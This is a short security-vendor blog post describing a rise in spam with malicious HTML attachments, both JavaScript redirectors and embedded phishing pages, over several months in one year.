The Recent Burst of HTML Attachment Spam

During the last 4 months, SophosLabs has seen an explosion in the resurgence of HTML attachment spam. As shown in the following figure, it accounts for 8% of all the spam in the June and September, and about 2-3% in July, August and October.

These malicious HTML attachments can be divided into two parts: malicious JavaScript redirectors or phishing attachments.

Malicious JavaScript redirectors: In June, a large number of malicious spam with embedded HTML attachments (detected as Troj/JSRedir-BO), was associated with Facebook password resetting tasks, the FIFA World Cup and Skype [1,2].

Then SophosLabs saw further waves of mass-spammed JavaScript redirectors in September, which had been detected as JS/WndRed-B.

On the other hand, in an attempt to evade detection, phishing scammers continued to tweak and change the manner of their phishing scam distribution. A large volume phishing scam campaigns against financial organizations like Paypal, and Banche di Credito Cooperativo, were sent out in the last few months. Instead of setting up a bogus financial website, scammers insert the phishing contents directly into the HTML attachment (as shown below):

Although the HTML attachment spam campaigns has been spiking during the last 4 months, from the view of SophosLabs; the campaigns have been inconsistent in their distribution. SophosLabs has no reason to believe that this pattern is likely to change in the next few months.